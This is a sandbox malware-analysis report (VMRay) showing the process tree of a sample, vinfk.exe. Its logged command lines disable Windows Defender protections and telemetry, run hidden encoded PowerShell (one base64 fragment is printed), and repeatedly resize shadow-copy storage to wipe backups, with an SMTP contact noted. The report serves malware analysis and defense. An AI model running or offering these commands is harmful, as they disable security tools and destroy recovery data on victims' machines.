VMRay Analyzer Report for Sample #1664761
VMRay Analyzer
3.2.2
URI
smtp.gmail.com
Resolved_To
Address
74.125.205.109
Process
1
4464
vinfk.exe
1376
vinfk.exe
"C:\Users\FD1HVy\Desktop\vinfk.exe"
C:\Users\FD1HVy\Desktop\
c:\users\fd1hvy\desktop\vinfk.exe
Child_Of
Created
Process
3
4068
vinfk.exe
4464
vinfk.exe
"C:\Users\FD1HVy\Desktop\vinfk.exe"
C:\Users\FD1HVy\Desktop\
c:\users\fd1hvy\desktop\vinfk.exe
Child_Of
Created
Process
4
2512
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell $ErrorActionPreference = 'SilentlyContinue'
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Process
5
3516
powershell.exe
2512
powershell.exe
powershell $ErrorActionPreference = 'SilentlyContinue'
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Process
6
4488
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Set-ExecutionPolicy -Scope Process -ExecutionPolicy Unrestricted -force
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
7
4476
powershell.exe
4488
powershell.exe
powershell Set-ExecutionPolicy -Scope Process -ExecutionPolicy Unrestricted -force
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Process
8
5096
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -force
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
9
952
powershell.exe
5096
powershell.exe
powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -force
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Process
10
900
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Set-ExecutionPolicy -Scope LocalMachine -ExecutionPolicy Unrestricted -force
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
11
2592
powershell.exe
900
powershell.exe
powershell Set-ExecutionPolicy -Scope LocalMachine -ExecutionPolicy Unrestricted -force
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Process
12
4944
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection /f
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
13
840
powershell.exe
4944
powershell.exe
powershell reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection /f
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Opened
Process
14
4004
reg.exe
840
reg.exe
"C:\WINDOWS\system32\reg.exe" delete HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection /f
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\reg.exe
Opened
Opened
Deleted
Process
15
1088
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack /f
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
16
2288
powershell.exe
1088
powershell.exe
powershell reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack /f
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Opened
Process
17
2616
reg.exe
2288
reg.exe
"C:\WINDOWS\system32\reg.exe" delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack /f
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\reg.exe
Opened
Opened
Process
18
2636
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack /v DiagTrackAuthorization /t REG_DWORD /d 0 /f
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
19
3804
powershell.exe
2636
powershell.exe
powershell reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack /v DiagTrackAuthorization /t REG_DWORD /d 0 /f
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Opened
Process
20
3428
reg.exe
3804
reg.exe
"C:\WINDOWS\system32\reg.exe" add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack /v DiagTrackAuthorization /t REG_DWORD /d 0 /f
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\reg.exe
Opened
Created
Process
21
3692
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
22
3544
powershell.exe
3692
powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Process
23
3716
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Set-MpPreference -SubmitSamplesConsent 2 -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
24
3256
powershell.exe
3716
powershell.exe
powershell Set-MpPreference -SubmitSamplesConsent 2 -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Process
25
4884
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Set-MpPreference -MAPSReporting 0 -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
26
3364
powershell.exe
4884
powershell.exe
powershell Set-MpPreference -MAPSReporting 0 -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Process
27
5004
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Set-MpPreference -DisableBehaviorMonitoring $true -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
28
4904
powershell.exe
5004
powershell.exe
powershell Set-MpPreference -DisableBehaviorMonitoring $true -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Process
29
1260
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Set-MpPreference -DisableBlockAtFirstSeen $true -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
30
5040
powershell.exe
1260
powershell.exe
powershell Set-MpPreference -DisableBlockAtFirstSeen $true -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Process
31
4004
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
32
4968
powershell.exe
4004
powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Process
33
4632
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Set-MpPreference -DisablePrivacyMode $true -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
34
4584
powershell.exe
4632
powershell.exe
powershell Set-MpPreference -DisablePrivacyMode $true -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Process
35
4612
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
36
4916
powershell.exe
4612
powershell.exe
powershell Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Process
37
4376
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Set-MpPreference -DisableArchiveScanning $true -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
38
3460
powershell.exe
4376
powershell.exe
powershell Set-MpPreference -DisableArchiveScanning $true -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Process
39
2304
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Process
40
1944
powershell.exe
2304
powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Process
41
3600
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Set-MpPreference -DisableScriptScanning $true -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
42
3632
powershell.exe
3600
powershell.exe
powershell Set-MpPreference -DisableScriptScanning $true -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Process
43
3416
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Add-MpPreference -AttackSurfaceReductionRules_Ids D1E49AAC-8F56-4280-B9BA-993A6D77406C -AttackSurfaceReductionRules_Actions Disabled
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
44
3356
powershell.exe
3416
powershell.exe
powershell Add-MpPreference -AttackSurfaceReductionRules_Ids D1E49AAC-8F56-4280-B9BA-993A6D77406C -AttackSurfaceReductionRules_Actions Disabled
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Process
45
3572
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Add-MpPreference -AttackSurfaceReductionRules_Ids C1DB55AB-C21A-4637-BB3F-A12568109D35 -AttackSurfaceReductionRules_Actions Disabled
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
46
3984
powershell.exe
3572
powershell.exe
powershell Add-MpPreference -AttackSurfaceReductionRules_Ids C1DB55AB-C21A-4637-BB3F-A12568109D35 -AttackSurfaceReductionRules_Actions Disabled
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Process
47
3720
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Add-MpPreference -AttackSurfaceReductionRules_Ids e6db77e5-3df2-4cf1-b95a-636979351e5b -AttackSurfaceReductionRules_Actions Disabled
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
48
4000
powershell.exe
3720
powershell.exe
powershell Add-MpPreference -AttackSurfaceReductionRules_Ids e6db77e5-3df2-4cf1-b95a-636979351e5b -AttackSurfaceReductionRules_Actions Disabled
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Process
49
4568
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Set-MpPreference -EnableNetworkProtection Disabled
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
50
3756
powershell.exe
4568
powershell.exe
powershell Set-MpPreference -EnableNetworkProtection Disabled
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Process
51
4476
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Set-MpPreference -EnableControlledFolderAccess Disabled
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
52
1360
powershell.exe
4476
powershell.exe
powershell Set-MpPreference -EnableControlledFolderAccess Disabled
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Process
53
3372
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell -ExecutionPolicy Bypass -F C:\Users\FD1HVy\AppData\Local\Temp\sad.ps1
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
54
5096
powershell.exe
3372
powershell.exe
powershell -ExecutionPolicy Bypass -F C:\Users\FD1HVy\AppData\Local\Temp\sad.ps1
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Created
Opened
Read_From
Process
55
3704
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC [encoded payload omitted]
c:\windows\syswow64\cmd.exe
Created
Opened
Opened
Opened
Process
56
2320
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC [encoded payload omitted]
KAGQATgB6AGMAcABMAEYAdABUAGQARgBKAHAAVABrAGQAZABXADIATgBJAFkAWABKAGQATQBUAEkAMABLAFMAQQBwACIADQAKACQAZAAgAD0AIABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQB0AGYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGMAKQApAA0ACgBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAkAGQA
ჺ
c:\windows\syswow64\cmd.exe
Created
Opened
Opened
Opened
Opened
Process
57
3996
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC
c:\windows\syswow64\cmd.exe
Created
Opened
Opened
Opened
Process
58
2304
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC 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
c:\windows\syswow64\cmd.exe
Created
Opened
Opened
Opened
Opened
Process
59
4588
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC 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
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
60
3848
powershell.exe
4588
powershell.exe
PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC
C:\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
61
5032
forfiles.exe
3848
forfiles.exe
"C:\WINDOWS\system32\forfiles.exe" /c "cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB"
C:\
c:\windows\syswow64\forfiles.exe
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Process
62
4620
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
63
2920
vssadmin.exe
4620
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
64
3780
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
65
4636
vssadmin.exe
3780
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
66
5036
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
67
4660
vssadmin.exe
5036
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
68
2148
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
69
4904
vssadmin.exe
2148
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
70
2740
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
71
3456
vssadmin.exe
2740
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
72
3480
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
73
4884
vssadmin.exe
3480
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
74
4484
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
75
952
vssadmin.exe
4484
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
76
4908
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
77
840
vssadmin.exe
4908
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
78
1608
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
79
900
vssadmin.exe
1608
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
80
4944
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
81
3944
vssadmin.exe
4944
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
82
1752
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
83
240
vssadmin.exe
1752
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
84
4520
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
85
3448
vssadmin.exe
4520
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
86
4820
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
87
916
vssadmin.exe
4820
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
88
3064
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
89
4924
vssadmin.exe
3064
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
90
4556
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
91
768
vssadmin.exe
4556
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
92
1440
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
93
3328
vssadmin.exe
1440
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
94
4988
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
95
5092
vssadmin.exe
4988
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
96
4640
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
97
4576
vssadmin.exe
4640
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
98
1380
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
99
4392
vssadmin.exe
1380
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
100
3552
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
101
1272
vssadmin.exe
3552
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
102
700
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
103
3288
vssadmin.exe
700
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
104
3428
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
105
4940
vssadmin.exe
3428
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
106
4008
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
107
3576
vssadmin.exe
4008
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
108
1360
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC 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
c:\windows\syswow64\cmd.exe
Created
Opened
Opened
Opened
Opened
Process
109
4476
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC 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
c:\windows\syswow64\cmd.exe
Created
Opened
Opened
Opened
Process
110
4804
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC
c:\windows\syswow64\cmd.exe
Created
Opened
Opened
Opened
Opened
Process
111
4488
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC 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
c:\windows\syswow64\cmd.exe
Created
Opened
Opened
Opened
Opened
Process
112
1088
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC 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
c:\windows\syswow64\cmd.exe
Created
Opened
Opened
Opened
Opened
Process
113
2512
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC 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
c:\windows\syswow64\cmd.exe
Created
Opened
Opened
Opened
Opened
Process
114
3532
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC 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
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
115
1692
powershell.exe
3532
powershell.exe
PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC 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
C:\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
116
3912
forfiles.exe
1692
forfiles.exe
"C:\WINDOWS\system32\forfiles.exe" /c "cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded"
C:\
c:\windows\syswow64\forfiles.exe
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
